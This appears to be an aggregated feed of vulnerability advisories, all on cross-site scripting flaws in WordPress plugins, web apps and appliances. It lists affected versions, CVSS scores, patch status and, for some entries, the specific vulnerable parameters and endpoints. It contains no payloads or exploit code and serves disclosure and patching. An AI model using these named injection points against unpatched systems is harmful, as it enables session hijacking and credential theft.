Cross-Site Scripting

Aspera Faspex versions up to 5.0.14.3 contains a vulnerability that allows attackers to conduct various attacks against the vulnerable system, including cross-site scri (CVSS 5.4).

IBM Aspera Faspex 5 5.0.0 through 5.0.14.3 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. [CVSS 5.4 MEDIUM]

Cross-site Scripting (XSS) allows an attacker to submit specially crafted data to the application which is returned unaltered in the resulting web page.

Stored XSS in NextScripts Social Networks Auto-Poster plugin for WordPress (versions up to 4.4.6) allows authenticated Contributor-level users to inject malicious scripts through the `[nxs_fbembed]` shortcode due to insufficient input sanitization. Attackers can embed arbitrary JavaScript that executes when other users access the affected pages. A patch is not currently available.

RenderBlocking is a MediaWiki extension that allows interface administrators to specify render-blocking CSS and JavaScript. versions up to 0.1.1 is affected by cross-site scripting (xss).

Copyparty versions before 1.20.11 fail to apply the nohtml security restriction to SVG files, allowing authenticated users with write permissions to upload SVG images containing malicious JavaScript that executes when opened by other users. This cross-site scripting vulnerability bypasses the intended protection against JavaScript execution in user-uploaded content. The vulnerability has been patched in version 1.20.11.

Stored cross-site scripting in FileBrowser versions prior to 1.3.1-beta and 1.2.2-stable allows authenticated attackers to inject malicious scripts through share metadata fields that are improperly rendered without HTML escaping. When victims visit affected share URLs, the injected scripts execute in their browsers with full privileges, potentially leading to session hijacking, credential theft, or further compromise. A patch is available in the fixed versions, though exploitation currently shows 0% adoption likelihood.

Unlimited Elements for Elementor (WordPress plugin) is affected by cross-site scripting (xss) (CVSS 7.2).

Information disclosure in Microsoft 365 Apps Excel allows unauthenticated remote attackers to extract sensitive data through stored cross-site scripting attacks in generated web content. The vulnerability requires no user interaction and affects all Excel users who process untrusted documents. No patch is currently available, leaving users dependent on mitigation strategies until Microsoft releases a fix.

Microsoft SharePoint Server contains a reflected cross-site scripting vulnerability that allows remote attackers to execute arbitrary scripts in users' browsers through malicious links, enabling spoofing attacks and credential theft. The vulnerability requires user interaction to trigger and affects all SharePoint deployments with no available patch. With a CVSS score of 8.1, this poses a significant risk to organizations relying on SharePoint for collaboration.

FortiSIEM 7.3.0-7.3.4 and 7.4.0 are vulnerable to reflected cross-site scripting that allows unauthenticated remote attackers to inject malicious scripts through URL parameters, enabling social engineering attacks against users who click malicious links. The vulnerability requires user interaction to trigger but has no authentication requirements, making it practical for phishing campaigns that redirect victims to spoofed pages.

Stored XSS in MetForm Pro's Quiz feature allows unauthenticated attackers to inject malicious scripts through insufficient input sanitization in WordPress versions up to 3.9.6. When users access affected pages, the injected scripts execute in their browsers, potentially compromising session data or performing unauthorized actions. No patch is currently available.

An issue pertaining to CWE-79: Improper Neutralization of Input During Web Page Generation was discovered in benkeen generatedata 4.0.14. [CVSS 6.1 MEDIUM]

An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.2, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an authenticated privileged attacker to execute code via crafted requests. [CVSS 4.8 MEDIUM]

Siemens devices have a stored XSS in trace file handling (CVSS 9.6) enabling code execution when administrators view diagnostic data.

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists that could cause condition where authenticated attackers can have a victim’s browser run arbitrary JavaScript when the victim hovers over a maliciously crafted element on a web server containing the injected payload.

facileManager is a modular suite of web apps built with the sysadmin in mind. versions up to 6.0.4 is affected by cross-site scripting (xss) (CVSS 7.6).

FacileManager versions prior to 6.0.4 contain a reflected cross-site scripting vulnerability in the fmDNS module's log_search_query parameter that allows authenticated attackers to inject malicious JavaScript through crafted URLs. An attacker with login credentials can exploit this to execute arbitrary scripts in users' browsers, potentially compromising sensitive administrative data or session tokens. No patch is currently available for affected deployments.

Bucket is a MediaWiki extension to store and retrieve structured data on articles. versions up to 2.1.1 is affected by cross-site scripting (xss).

Flarum's nicknames extension allows authenticated users to inject email-like hyperlinks into their nicknames, which are rendered verbatim in plain-text notification emails sent to other users. An attacker can exploit this to craft malicious nicknames that email clients interpret as clickable links, potentially redirecting recipients to attacker-controlled domains for phishing or credential harvesting. No patch is currently available for this vulnerability.

Appsmith platform prior to version 1.96 has a critical stored XSS enabling account takeover through crafted admin panel content.

DOM-based XSS in SAP Business One Job Service allows unauthenticated attackers to inject malicious code through unvalidated URL query parameters, compromising user sessions when victims interact with crafted links. Successful exploitation could leak sensitive data or modify application content, though availability is not affected. No patch is currently available.

Affected Product(s)Version(s)InfoSphere Data Architect9.2.1 [CVSS 6.1 MEDIUM]

An issue pertaining to CWE-79: Improper Neutralization of Input During Web Page Generation was discovered in linagora Twake v2023.Q1.1223. This allows attackers to execute arbitrary code. [CVSS 8.8 HIGH]

An issue pertaining to CWE-79: Improper Neutralization of Input During Web Page Generation was discovered in Sunbird-Ed SunbirdEd-portal v1.13.4. [CVSS 5.4 MEDIUM]

An issue pertaining to CWE-79: Improper Neutralization of Input During Web Page Generation was discovered in YMFE yapi v1.12.0. [CVSS 5.4 MEDIUM]

A vulnerability has been found in SourceCodester Resort Reservation System 1.0. The affected element is an unknown function of the file /?page=manage_reservation of the component Reservation Management Module. [CVSS 3.5 LOW]

A reflected Cross-Site Scripting (XSS) vulnerability has been found in Eventobot. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending him/her a malicious URL using the 'name' parameter in '/search-results'. [CVSS 6.1 MEDIUM]

Stored cross-site scripting in itsourcecode Payroll Management System 1.0 allows unauthenticated remote attackers to inject malicious scripts via the ID parameter in /manage_employee_allowances.php. Public exploit code exists for this vulnerability, though no patch is currently available. Successful exploitation could enable credential theft or unauthorized actions within the payroll system.

Web-Based Pharmacy Product Management System versions up to 1.0 is affected by cross-site scripting (xss) (CVSS 3.5).

Simple Flight Ticket Booking System versions up to 1.0 is affected by cross-site scripting (xss) (CVSS 4.3).

A flaw has been found in YiFang CMS 2.0.5. This affects the function update of the file app/db/admin/D_singlePageGroup.php. [CVSS 3.5 LOW]

A vulnerability was detected in YiFang CMS 2.0.5. The impacted element is the function update of the file app/db/admin/D_singlePage.php. [CVSS 3.5 LOW]

A security vulnerability has been detected in YiFang CMS 2.0.5. The affected element is the function update of the file app/db/admin/D_friendLink.php. [CVSS 3.5 LOW]

A weakness has been identified in 1024-lab/lab1024 SmartAdmin versions up to 3.29. is affected by cross-site scripting (xss) (CVSS 3.5).

A security flaw has been discovered in 1024-lab/lab1024 SmartAdmin up to 3.29. Impacted is an unknown function of the file smart-admin-web-javascript/src/views/business/oa/notice/components/notice-form-drawer.vue of the component Notice Module. The manipulation results in cross site scripting. The attack can be launched remotely. The exploit has been released to the public and may be used for a...

A vulnerability was determined in Wavlink WL-WN579X3-C 231124. This vulnerability affects the function sub_401AD4 of the file /cgi-bin/adm.cgi. [CVSS 2.4 LOW]

Reflected cross-site scripting (XSS) in SourceCodester Loan Management System 1.0 allows unauthenticated remote attackers to inject malicious scripts via the page parameter in /index.php. Public exploit code exists for this vulnerability, increasing the risk of active exploitation. The vulnerability enables attackers to perform actions on behalf of victims or steal sensitive information, though no patch is currently available.

The DisallowedRawHtml extension in PHP Commonmark (league/commonmark) versions prior to 2.8.1 can be bypassed by injecting whitespace characters between HTML tag names and closing brackets, allowing malicious scripts to pass sanitization filters and execute in user browsers. Applications relying solely on this extension to sanitize untrusted markdown input are vulnerable to cross-site scripting attacks, though those using additional HTML sanitizers are unaffected. No patch is currently available for affected versions.

Account takeover in Zitadel versions 4.0.0 through 4.11.1 is possible through improper redirect URI validation in the login V2 interface, allowing attackers with high privileges to compromise user accounts. This cross-site scripting vulnerability affects organizations using the vulnerable Zitadel identity management platform and has been resolved in version 4.12.0.

Stored XSS in ZITADEL identity management platform versions 4.0.0 to 4.11.1 allows unauthenticated attackers to inject persistent scripts through the login flow. Patch available.

DOM-based XSS in the RSS Aggregator plugin for WordPress (versions up to 5.0.11) allows unauthenticated attackers to execute arbitrary JavaScript in an administrator's browser session by exploiting missing origin validation in postMessage handlers. An attacker can craft a malicious website that tricks an admin into visiting it, sending crafted payloads that bypass the plugin's unsafe URL handling in admin-shell.js. This affects all WordPress installations running the vulnerable plugin versions without authentication requirements.

Stored XSS in LotekMedia Popup Form plugin for WordPress through version 1.0.6 allows administrators to inject malicious scripts into popup settings due to improper input sanitization. When site visitors view pages containing the affected popup, the injected scripts execute in their browsers, potentially compromising user sessions or stealing sensitive data. A patch is not currently available.

Stored XSS in the Show YouTube video WordPress plugin through improper sanitization of the 'syv' shortcode attributes allows authenticated users with contributor-level permissions to inject malicious scripts into pages. When other users view affected pages, the injected scripts execute in their browsers, potentially compromising sessions or stealing sensitive data. No patch is currently available for versions up to 1.1.

Infomaniak Connect for OpenID (WordPress plugin) is affected by cross-site scripting (xss) (CVSS 6.4).

Stored XSS in the WordPress Consensus Embed plugin through version 1.6 allows authenticated contributors and above to inject malicious scripts into pages via insufficiently sanitized shortcode attributes. When users visit affected pages, the injected scripts execute in their browsers, potentially compromising session data or performing unauthorized actions. No patch is currently available for this vulnerability.

Media Library Alt Text Editor (WordPress plugin) is affected by cross-site scripting (xss) (CVSS 6.4).

The DA Media GigList WordPress plugin up to version 1.9.0 contains stored cross-site scripting (XSS) in its shortcode functionality due to improper input validation, allowing authenticated contributors and above to inject malicious scripts that execute for all users viewing affected pages. This vulnerability requires valid WordPress account credentials but no user interaction to exploit, enabling persistent code injection across the site.

The MyQtip WordPress plugin through version 2.0.5 contains a stored cross-site scripting vulnerability in its shortcode handler that fails to properly sanitize user-supplied attributes. Authenticated users with contributor-level permissions or higher can inject malicious scripts that execute in the browsers of visitors viewing affected pages. No patch is currently available for this vulnerability.

Stored cross-site scripting in the WordPress Wueen plugin through version 0.2.0 allows authenticated users with contributor-level permissions to inject malicious scripts via the wueen-blocket shortcode due to inadequate input validation. Injected scripts execute in the browsers of any user viewing affected pages, potentially enabling session hijacking, credential theft, or defacement. No patch is currently available.

Unauthenticated attackers can inject malicious scripts into WordPress sites running the WP App Bar plugin (versions up to 1.5) through the 'app-bar-features' parameter due to missing input validation and authorization checks. When site administrators access the plugin's settings page, the stored payload executes in their browser, enabling credential theft or unauthorized actions. No patch is currently available for this vulnerability.

Stored XSS in the Carta Online WordPress plugin through version 2.13.0 allows authenticated administrators to inject malicious scripts into admin settings that execute for other users accessing affected pages. The vulnerability requires administrator privileges and only impacts WordPress multisite installations or those with unfiltered_html disabled. No patch is currently available.

Reflected cross-site scripting (XSS) in Wallos password reset functionality before version 4.6.2 allows unauthenticated attackers to inject malicious scripts by manipulating token and email parameters that are output without sanitization. Public exploit code exists for this vulnerability, affecting self-hosted instances of Wallos. A patch is available in version 4.6.2 and later.

Defuddle versions prior to 0.9.0 fail to properly escape image attributes in HTML processing, allowing attackers to inject malicious event handlers through specially crafted alt text containing quote characters. Public exploit code exists for this cross-site scripting vulnerability. The vulnerability affects all users of Defuddle before version 0.9.0, and a patch is available.

Stored XSS in WordPress Stock Ticker plugin through version 3.26.1 allows authenticated administrators to inject malicious scripts into admin settings that execute for other users viewing affected pages. The vulnerability requires administrator privileges and only impacts multi-site WordPress installations or those with unfiltered_html disabled. No patch is currently available.

Stored XSS in MailArchiver plugin for WordPress versions up to 4.4.0 allows authenticated administrators to inject malicious scripts through insufficiently sanitized admin settings, affecting multi-site installations and those with disabled unfiltered_html. Attackers with admin privileges can execute arbitrary JavaScript that persists and triggers when other users access affected pages. No patch is currently available.

Reflected XSS in CM Custom Reports plugin for WordPress (versions up to 1.2.7) allows unauthenticated attackers to inject malicious scripts through inadequately sanitized 'date_from' and 'date_to' parameters. An attacker can exploit this by tricking users into clicking malicious links, causing arbitrary scripts to execute in their browsers with access to sensitive data or session information. No patch is currently available.

Stored XSS in the Hammas Calendar WordPress plugin through version 1.5.11 allows authenticated contributors and above to inject malicious scripts via the 'apix' parameter in the 'hp-calendar-manage-redirect' shortcode due to inadequate input sanitization. When users access pages containing the injected payload, the scripts execute in their browsers, potentially leading to session hijacking, credential theft, or malware distribution. No patch is currently available.

Stored cross-site scripting in Zikestor SKS8310-8X firmware versions 1.04.B07 and earlier allows authenticated users to inject malicious scripts via the System Name field, which execute when other administrators view the configuration. The lack of proper output encoding enables attackers with login credentials to compromise the security of administrative sessions viewing the affected switch settings.

Reflected cross-site scripting in GroupOffice versions before 6.8.155, 25.0.88, and 26.0.10 allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser by injecting malicious code through the Base64-encoded f parameter. The vulnerability exists in the external/index flow where user input is decoded and inserted into inline JavaScript without proper sanitization. Public exploit code exists for this vulnerability.

Reflected cross-site scripting in GroupOffice installer versions prior to 6.8.155, 25.0.88, and 26.0.10 allows unauthenticated attackers to inject arbitrary scripts through the license parameter in install/license.php. Public exploit code exists for this vulnerability, enabling attackers to execute malicious JavaScript in users' browsers with moderate impact to confidentiality and integrity. The vulnerability requires user interaction and affects the web-accessible installation endpoint.

HTML meta tags with http-equiv="refresh" attributes fail to properly escape URLs inserted through certain actions, enabling cross-site scripting (XSS) attacks against applications using this functionality. An unauthenticated attacker can exploit this to execute arbitrary JavaScript in users' browsers by crafting malicious URLs. No patch is currently available, though a GODEBUG setting (htmlmetacontenturlescape=0) can be configured as a temporary mitigation.

Kestra versions 1.1.10 and earlier allow authenticated users to perform cross-site scripting (XSS) attacks through the execution-file preview feature, which renders unsanitized Markdown as HTML. An attacker with login credentials can inject malicious scripts that execute in other users' browsers, potentially leading to session hijacking or credential theft. Public exploit code exists and no patch is currently available.

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Pascal Birchler Preferred Languages allows DOM-Based XSS.This issue affects Preferred Languages: from n/a through 2.2.2. [CVSS 5.9 MEDIUM]

Reflected cross-site scripting in WP All Import plugin versions up to 4.0.0 allows unauthenticated attackers to inject malicious scripts through the 'filepath' parameter due to improper input validation and output encoding. Successful exploitation requires tricking users into clicking a specially crafted link, after which arbitrary JavaScript executes in their browser session. A patch is not currently available.

Reflected XSS in SiYuan knowledge management before 3.5.9.

Cross-site scripting in HumHub 1.18.0's Button component allows unauthenticated attackers to inject and execute malicious scripts in users' browsers through inconsistent output encoding. Affected users could have their sessions compromised or be redirected to malicious content without any user interaction beyond visiting a crafted page. A patch is available in version 1.18.1.

Reflected XSS in changedetection.io versions prior to 0.54.4 allows unauthenticated remote attackers to inject malicious JavaScript through the /rss/tag/ endpoint via an unescaped tag_uuid parameter, enabling session hijacking or credential theft when victims visit crafted links. The vulnerability requires user interaction to trigger and affects the Flask-based application with public exploit code available. Users should upgrade to version 0.54.4 or later immediately.

OneUptime versions 10.0.11 and earlier contain an improper WebAuthn implementation where server-side challenge validation is missing, allowing attackers with a captured assertion to replay valid authentication tokens indefinitely and bypass multi-factor authentication. The vulnerability affects authenticated users and requires only low privileges to exploit, with public exploit code already available. No patches are currently available for this high-severity flaw.

Stored XSS in Gokapi through malicious SVG file uploads enables authenticated attackers to execute arbitrary JavaScript in users' browsers via hotlinked files. An attacker with valid credentials can craft SVG payloads that persist in the application and compromise other users accessing the shared links. No patch is currently available for versions prior to 2.2.3.

LangBot is a global IM bot platform designed for LLMs. versions up to 4.8.7 is affected by cross-site scripting (xss) (CVSS 6.3).

Chartbrew versions prior to 4.8.4 allow authenticated users to upload arbitrary files by bypassing file type validation, enabling stored XSS attacks through malicious HTML files served from the uploads directory. An attacker can exploit this to steal authentication tokens stored in localStorage and achieve account takeover. Public exploit code exists for this vulnerability, and no patch is currently available.

Second stored XSS in Chamilo LMS before 1.11.34.

Stored XSS in Chamilo LMS before 1.11.34.

Chamilo is a learning management system. Prior to version 1.11.34, a stored XSS vulnerability exists in Chamilo LMS that allows a staff account to execute arbitrary JavaScript in the browser of higher-privileged admin users. [CVSS 5.4 MEDIUM]

Chamilo is a learning management system. Prior to version 1.11.34, there is a stored XSS vulnerability in Chamilo LMS (Verison 1.11.32) allows an attacker to inject arbitrary JavaScript into the platform’s social network and internal messaging features. [CVSS 8.8 HIGH]

Reflected cross-site scripting in HSC Cybersecurity Mailinspector through version 5.3.2-3 allows remote attackers to inject malicious scripts via the error_description parameter in the URL handler component. Public exploit code exists for this vulnerability, which could enable attackers to steal session cookies or perform actions on behalf of authenticated users. Users should upgrade to version 5.4.0 or apply the available hotfix immediately.

Stored Cross-Site Scripting in the Greenshift page builder plugin for WordPress (versions up to 12.8.5) allows authenticated users with Contributor privileges or higher to inject malicious scripts through the `_gspb_post_css` post meta and `dynamicAttributes` block attributes due to inadequate input sanitization. When other users access affected pages, the injected scripts execute in their browsers, potentially compromising their sessions or stealing sensitive data. No patch is currently available.

Stored cross-site scripting in Frappe versions prior to 16.11.0 and 15.102.0 allows unauthenticated attackers to execute arbitrary JavaScript in users' browsers through malicious image URLs in avatar fields and website comments. The vulnerability affects any user viewing a page containing the compromised avatar, enabling session hijacking, credential theft, or malware distribution without user interaction.

MarkUs prior to version 2.9.1 fails to sanitize user-submitted file contents in the HTML rendering endpoint, allowing authenticated users with UI interaction to inject malicious scripts that execute in other users' browsers. An attacker can exploit this reflected cross-site scripting vulnerability to steal session tokens, modify grades, or perform actions on behalf of affected students and instructors. The vulnerability has been patched in version 2.9.1.

Stored XSS in Chamilo LMS before 1.11.34 via file uploads in Social Networks. Leads to account takeover.

lxml_html_clean versions prior to 0.4.4 fail to sanitize <base> HTML tags, allowing attackers to inject malicious base tags and redirect relative links to attacker-controlled domains. Public exploit code exists for this vulnerability. The issue affects applications using the default Cleaner configuration and has been remediated in version 0.4.4.

lxml_html_clean versions before 0.4.4 fail to properly sanitize CSS Unicode escape sequences in the _has_sneaky_javascript() method, allowing attackers to bypass filters and inject malicious @import statements or XSS payloads. Public exploit code exists for this vulnerability, which affects applications using the library for HTML sanitization. A patch is available in version 0.4.4 and should be applied immediately to prevent CSS-based injection attacks.

CKEditor 5 versions before 47.6.0 contain a stored XSS vulnerability in the General HTML Support feature that allows attackers to execute arbitrary JavaScript by injecting malicious markup into documents processed by vulnerable editor instances. This vulnerability affects users relying on unsafe General HTML Support configurations, potentially enabling session hijacking, credential theft, or malware distribution. No patch is currently available for affected deployments.

Stored XSS in Wagtail's simple_translation module allows authenticated admin users to inject malicious JavaScript through specially-crafted page titles that executes when other admins perform translation actions, potentially compromising their credentials. The vulnerability affects Wagtail versions prior to 6.3.8, 7.0.6, 7.2.3, and 7.3.1, and requires admin-level access to exploit, limiting exposure to internal threats. Patches are available for all affected versions.

Stored XSS in Wagtail's TableBlock allows authenticated users with page editing permissions to inject malicious class attributes that execute arbitrary JavaScript when pages are viewed by other users. An attacker could exploit this to perform administrative actions or steal credentials from higher-privileged users viewing the compromised content. The vulnerability affects Wagtail versions prior to 6.3.8, 7.0.6, 7.2.3, and 7.3.1, with patches now available.

Gogs versions prior to 0.14.2 contain a DOM-based XSS vulnerability in the Issue creation page where attackers can inject malicious scripts through milestone names that execute when other users interact with those milestones. An authenticated attacker can craft a repository with a malicious milestone name containing JavaScript payloads that trigger in victim browsers, potentially compromising user sessions or sensitive data. No patch is currently available for affected versions.

Stored cross-site scripting in Gogs prior to version 0.14.2 allows unauthenticated attackers to inject malicious scripts through template rendering of user-controlled data, potentially affecting all users viewing compromised content. The vulnerability exploits unsafe handling of data URLs combined with permissive sanitization, enabling attackers to steal session cookies, deface pages, or perform actions on behalf of victims. A patch is available in version 0.14.2 and later.

Stored XSS in Gogs prior to version 0.14.2 allows authenticated users to execute arbitrary JavaScript in comments and issue descriptions by exploiting the HTML sanitizer's allowance of data: URI schemes. This affects all users viewing malicious content within the same Gogs instance and could enable session hijacking or credential theft. Public exploit code exists for this vulnerability, though a patch is available in version 0.14.2 and later.

Koha versions 25.11 and earlier contain a stored cross-site scripting vulnerability in the News function that allows authenticated users to inject malicious scripts affecting other users who view the compromised content. Public exploit code exists for this vulnerability, and attackers can leverage it to steal session data or perform actions on behalf of victims. A patch is not currently available for affected deployments.